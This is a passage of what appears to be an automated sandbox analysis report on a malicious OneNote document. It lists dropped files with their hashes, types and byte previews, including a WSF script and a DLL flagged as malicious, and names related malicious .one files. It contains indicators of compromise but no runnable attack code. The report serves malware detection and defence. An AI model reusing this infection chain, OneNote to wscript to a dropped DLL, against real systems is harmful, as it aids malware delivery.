                                                                                                                                                                                                                  SSDEEP:192:p9wNdtRKcVHso6zsqm06xaqZdingVzLZ7/PGSIz/yycRTbChh/JzhbEx15RGb:mdtMcVHqgAqTinMzLZ7/uSIz/yTR/mhF
                                                                                                                                                                                                                  MD5:DDC3CC30794277500EFE4BC6667EC123
                                                                                                                                                                                                                  SHA1:EFC9642C1F95B5FC38764476AE481649C016FA0C
                                                                                                                                                                                                                  SHA-256:7F5B660A1A0BF46C75AAF19B4F77A0E086DE003EC03AFC1F58D871D55AA5BA9E
                                                                                                                                                                                                                  SHA-512:25232A84604C3959634D33090238FEC8D51E40AD84EB3A08BB8522A81BE1E83378649C014E98E1DFCDF46B7BFAC92D8D2429211CD11D7EE0334C9C3DF7C1B6A6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...U.........1x5.....PLTE....................................e........................................................s...............x..........................o..............................................................................................................................................................~.............................m...............................................j...............................................p.......z......................................................x..............|........................................v.......................y..........................................................h...........................................................................P..{....bKGD....H....cmPPJCmp0712....H.s...(SIDATx^.}i@S..N....h...!..)....AI%..p.L."a..)..`U..,h..:O.b.:.j+.Z).b..zN.s..{O...&|..N}...${....~.....k}.[k}{.o^.D_..W:35ly..7rL....6n0.A...b

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000BB.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 88 x 574, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):19920
                                                                                                                                                                                                                  Entropy (8bit):7.987696084459766
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:DRSgtAxJx7bzvAsVSqQElOT4uHmpmvNYT9aPU+QtsC2LgfIqJZnbeyRB:DsgaN7bzvAsVdK4uGQFUZ6bU/p3
                                                                                                                                                                                                                  MD5:1BDAD9B3B6DE549162F9567697389E1C
                                                                                                                                                                                                                  SHA1:5D9C09159F07A3A9BDCC6C4B9BD9CB72D0184E6F
                                                                                                                                                                                                                  SHA-256:0908A4CFA23F93011176D47F45843E9CA2973030421996E8E27484781F54B0EC
                                                                                                                                                                                                                  SHA-512:475040779AC247BB5C3E11862FB55FBDDFA12D759EE86A33E11BC1F3B656D6CD0F9B25146C0113E43E1D8001D8867D3BC3BF7E6FE21F3A0016CB1F8B70B7A15A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...X...>......y=h....PLTE..................................t........iw..............................................._n|...Tds...ky......................................................p~.....................................................dr.................v.............................................n{.......ap}..........x.....z...................u......................|..Vfu............r.....w........................................~...................Zjx...................................Yiw............w..|....................Xgv{.....y...........................jx..............\lz.........}..z.....t..[ky........u..y.....gu................................{..........}.....u....................~...........y....r.....bKGD....H....cmPPJCmp0712....H.s...JfIDATx^...\.W./.}....Sy...(..4....D.-.....H...% .$"D.Qr.......`..;...6...N......s...^...L.....Y{.GQU`..~...j....{...-Ax.K..&.....F..I\i..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000BD.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):179460
                                                                                                                                                                                                                  Entropy (8bit):7.979020171518325
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3072:oiKXvL7lv0am/R1vrdH+9dK6zPQ6bbnGDpcGGDNMIOIMAT8q9Vc02Q57S4A+vMFz:+vlvC/HvgA6fGqGGJlO1qZ71W6CzDn
                                                                                                                                                                                                                  MD5:4E131DBFEC5C2462273CA7B35675B9D9
                                                                                                                                                                                                                  SHA1:CA037F444D819A118AC37D7AA3782B9BF94C1616
                                                                                                                                                                                                                  SHA-256:2A4A3530D652E227DDD5ADC096A95F6034718F7C380B07DB622022D768815059
                                                                                                                                                                                                                  SHA-512:C333ECEB1439D0238BF44FB7896E62DBA4C645B70413AA0F99C1F10E8DCD20C2EEE5C83F2E9DDE9A2494C85A6D8D13CFFFC4160E2F598E17867015F5244D656A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1AQ.aq...".....2Rr..Bb..#34.....CSs.$5c.t....%.Dd.6.T..u.U....E.7w........................!.1A.Qaq......2."r.3....BRb.#4......CsSc...$.5..%.DT.t67d..Uu...'............?..c.......p..z..i.....z......kj........F>f......3N...M....RM.&..-.~.Q..'.....q.a..w...-~......g.{..&.......V.n.D....>FS!n.....@..)...W..q..Wr{..J.gf.{.M$.P@m.,..9..&m.D...w.._...-.O........s.....h.k~......(.K...V..l.-...+.9.k......*......#.p#.O..9M..mF...C.......7+.AI....4vw.;..H......e..Q.u[.eUK.....z.....[.Kt...s..Lf.4..l{.....sh.............=..;..iqkj.m.a...NH......v..H..$..q.y......c...U[Mcf.......+...S-...^....4..T..YtL.x.v.;.....<...Ik|B.$.s8......3.+.8.l.. h.:....%B..W..I.QRS..,*x.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000BF.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):109698
                                                                                                                                                                                                                  Entropy (8bit):7.954100577911302
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3072:rDlmvIWr0aRtNCfShCWBxyCHMlcVG0Ezy4FR:rDliIfot8ahCWBcCHDVwR
                                                                                                                                                                                                                  MD5:8D804A60E86627383BED6280ED62F1CF
                                                                                                                                                                                                                  SHA1:E23FF14B10AD0762DD67FBA3CD6EFC85647C0384
                                                                                                                                                                                                                  SHA-256:494547E566FB7A63DD429EB0699FE41AA8998F8EA2F758D813FE3D56C3075719
                                                                                                                                                                                                                  SHA-512:0FB19F3D00159F2748C3A54E952E551B9FEA6910D67A54DECA8D099992E50383EADB92768FF1F75CFFAE82A7A157B1E0F77A2F0BE7EC64FD2324304FDCA46577
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...............................................................................................!"#.123..AQB$..aq.RCS...b..c4%..rs..D&....5E6'..TdUte...u.....FV...7.......................!"..1A2B..QaqR.#.br3.........C%...$5.....c4U..Eeu&SsD.6T..................?.....O.C.....^..R<A.g...[....3.....r.0.....nX.S....}...[.?Z.....A.?..~~I..rY|N.o...9......!...o7r../-.y...'5.3.U.s".-.0.1......SS...&.Q.j.*.$m.e..:x....`}...EP.?.7..~G(so.......O.....z.N..<....~^a.e...........p9.?<._..|......~.<@.D.9..G..?.?z.y?z.C.U.w..[.,..A.+........s......g...G.^....pz.xY.....d8.y.X...P..O(A.O..~:._.......<...o..4s..^.^b..x......_a.....|{c...:..X.....}.._...[?..NK.c...}.<......H.G....+x.Z..|....n...o....`.nk.#.%x......-|...|7......N!=././..w.8x.".8....'x........w...,>....j[w8a..}..lS..?.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000BH.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):41893
                                                                                                                                                                                                                  Entropy (8bit):7.52654558351485
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
                                                                                                                                                                                                                  MD5:F25427EFECFEE786D5A9F630726DD140
                                                                                                                                                                                                                  SHA1:BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
                                                                                                                                                                                                                  SHA-256:5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
                                                                                                                                                                                                                  SHA-512:B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ*.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[F*ly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000BK.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):68633
                                                                                                                                                                                                                  Entropy (8bit):7.709776384921022
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
                                                                                                                                                                                                                  MD5:41241EE59AB7BC9EB34784E3BCE31CB4
                                                                                                                                                                                                                  SHA1:98680761A51E9199CF3C89F68B5309FBEC7EE3CB
                                                                                                                                                                                                                  SHA-256:035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
                                                                                                                                                                                                                  SHA-512:3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000BM.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):59832
                                                                                                                                                                                                                  Entropy (8bit):7.308211468398169
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
                                                                                                                                                                                                                  MD5:DCDD543A4E0BA2C1909BA095D46FFBCB
                                                                                                                                                                                                                  SHA1:B86C89537138FE07255354202D3EAD0B53B3C54D
                                                                                                                                                                                                                  SHA-256:28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
                                                                                                                                                                                                                  SHA-512:5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000BO.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                  Size (bytes):53259
                                                                                                                                                                                                                  Entropy (8bit):7.651662052139301
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
                                                                                                                                                                                                                  MD5:2EE369ABB7936F8C28FF0ABDD224EA05
                                                                                                                                                                                                                  SHA1:FE9D304A7B49E31EAE439369ABC548E265149636
                                                                                                                                                                                                                  SHA-256:FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
                                                                                                                                                                                                                  SHA-512:5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}.*.a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{|>..MN=:....Q[..H....a........|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u...*.p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\OneNote Archive\Getting Started.one

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):362512
                                                                                                                                                                                                                  Entropy (8bit):7.486496522298473
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6144:+yHwh4AIZ5A1QM6vUbHCkCBVoqx5HUvFOAjNPySj8MTcrOQMhuNBSMl:qWZ5A10vUbikCBVoqx5wOuqSJTcOQMZE
                                                                                                                                                                                                                  MD5:86C275046CB92FB6AA7B5D1A828FC6F5
                                                                                                                                                                                                                  SHA1:9C51DC82551947DD9585B2E95B173ED5E8564945
                                                                                                                                                                                                                  SHA-256:49B2BE97EC2D9B026847FF6938E6E5301E423189AEFEB3B0F0DC4084103A5C45
                                                                                                                                                                                                                  SHA-512:EC981C55C1ECB874C1E1B48B5F70DB001D1640E1F9A077EC8F8C700F48E2D9D44528FF57C74CCA9EAF83896B7B49A87DCC1AA2B845B7EC5A353555AFFABC9F84
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.R\{..M..Sx.)..jJ.f...@.../%|.&................?.....I.......*...*...*...*...................................................8....-.E...uQ....d(.x...........(~......................8.......0.....................@....I._......w........@.....E..&.K..0............................U....7..U....7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\OneNote Archive\Open Notebook.onetoc2

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):5136
                                                                                                                                                                                                                  Entropy (8bit):2.780237774784949
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:XHVna/uIPv4om1mAlthbXbUGp2qac0Pnac3:3pnrDHUDqa9Pnaq
                                                                                                                                                                                                                  MD5:D5FF31FDA994A3E19DE457C8EC81C7F4
                                                                                                                                                                                                                  SHA1:83C3106D8CE9DF2F450049F2788D049FB5C96C0B
                                                                                                                                                                                                                  SHA-256:099F831115C6EE31916277D561076645EB55A5AA76883AF93A5D4450CC8EE31C
                                                                                                                                                                                                                  SHA-512:DF3E97C5AAF1A2CE1820A9AA418FDDDB8022D604244C76FCF6B6461F8FA5B38F1DB0F9B40AC6B42EBE4AFFE16D319E76FF084403CDDC4F2CD54C56CAF78E0DC9
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:./.C..vL....W"v_8....-.E...uQ...................?.....I...........................................................................................................................................................|4..|.F..r=U.x.........[_n.r..M.moC.d].............................r....7..r....7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\OneNote15WatsonLog.etl

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                                                                  Entropy (8bit):0.33150563440532915
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:srq4UgT+t+Wpya/uMcl0qvMcl95PCq7sXb+lhqMlW8g1UEZ+lX1MAx7vKlCXlvoN:srIlLyaq9995Hab+2kXg1Q137v+uoeY
                                                                                                                                                                                                                  MD5:51E6999E31C5013DC47D40D4F6F2C098
                                                                                                                                                                                                                  SHA1:F3A4DBD2E6D61965384159291D7EA014B92A9B1D
                                                                                                                                                                                                                  SHA-256:9B6BA3FBEDDFE0EC1DFA5862520B8903729D26D65BAB5678800B81E8FE56DFD0
                                                                                                                                                                                                                  SHA-512:F8175736D1AC7F50C359EAE51B325BCCF299C1A5ABB5B837E6B361DA31B8DB76CE40C22462A6595439806A874ED71C16889C07E2D0BC3F0E1556FCCEF44A6B82
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.@..h...........................................h...............................@........&...............@.......B..............Zb..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.................................................................... ......$gG.X..........O.n.e.N.o.t.e. .W.a.t.s.o.n. .L.o.g...C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.n.e.N.o.t.e.1.5.W.a.t.s.o.n.L.o.g...e.t.l.......P.P.@........F..............................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\click.wsf

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):9
                                                                                                                                                                                                                  Entropy (8bit):2.94770277922009
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:tWn:tWn
                                                                                                                                                                                                                  MD5:07F5A0CFFD9B2616EA44FB90CCC04480
                                                                                                                                                                                                                  SHA1:641B12C5FFA1A31BC367390E34D441A9CE1958EE
                                                                                                                                                                                                                  SHA-256:A0430A038E7D879375C9CA5BF94CB440A3B9A002712118A7BCCC1FF82F1EA896
                                                                                                                                                                                                                  SHA-512:09E7488C138DEAD45343A79AD0CB37036C5444606CDFD8AA859EE70227A96964376A17F07E03D0FC353708CA9AAF979ABF8BC917E6C2D005A0052575E074F531
                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                  Preview:badum tss

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\rad617F4.tmp.dll

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):316928
                                                                                                                                                                                                                  Entropy (8bit):7.337848702590508
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6144:cwNQMQTlfdUPABVy559hhR3iP7TfPYbrF1EFVw0todxKROsCt:rNbadDBkZ6rPeEFizdxxsCt
                                                                                                                                                                                                                  MD5:BFC060937DC90B273ECCB6825145F298
                                                                                                                                                                                                                  SHA1:C156C00C7E918F0CB7363614FB1F177C90D8108A
                                                                                                                                                                                                                  SHA-256:2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
                                                                                                                                                                                                                  SHA-512:CC1FEE19314B0A0F9E292FA84F6E98F087033D77DB937848DDA1DA0C88F49997866CBA5465DF04BF929B810B42FDB81481341064C4565C9B6272FA7F3B473AC5
                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                  • Filename: Insight_Medical_Publishing_3.one, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: Insight_Medical_Publishing_4.one, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: OMICS_Online_1.one, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: Insight_Medical_Publishing.one, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: Omics_Journal.one, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: OMICS.one, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: OPAST_GROUP_1.one, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: OPAST_GROUP_LLC.one, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: OPAST_GROUP.one, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: Opast_International.one, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: opastonline.com.one, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: Opast_Publishing_Group_1.one, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: Opast_Publishing_Group.one, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: omicsonline.net.one, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: report_03_16_2023.one, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: 2023-03-16_0923.one, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: report_03_16_2023.one, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: 100935929722734787.one, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: NG7553084292252526_202303161746.one, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: 2023-03-16_1753.one, Detection: malicious, Browse
                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L`.=...n...n...nCy.o...nCy.o...nCy.o...n.z.o(..n.z.o...n.z.o...nCy.o...n...nq..n.z.o...n.z.o...n.zsn...n...n...n.z.o...nRich...n................PE..d....6.d.........." ...!.F...................................................0............ .............................................T...d...d....`..(....0............... ..........8...........................p...@............`..`............................text....D.......F.................. ..`.rdata.......`.......J..............@..@.data...............................@....pdata.......0......................@..@_RDATA..\....P......................@..@.rsrc...(....`......................@..@.reloc....... ......................@..B........................................................................................................................................................................................

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{007E2434-CF2A-44E9-96B7-B1F3807D47FD}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):12824
                                                                                                                                                                                                                  Entropy (8bit):7.974776104184905
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
                                                                                                                                                                                                                  MD5:2628353534C5AD86CBFE57B6616D46DD
                                                                                                                                                                                                                  SHA1:244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
                                                                                                                                                                                                                  SHA-256:69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
                                                                                                                                                                                                                  SHA-512:2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}*f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F*.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.|. ......EC..............1.\

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{00EF12F1-DE32-4EC0-8D82-9B91A564EAAE}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
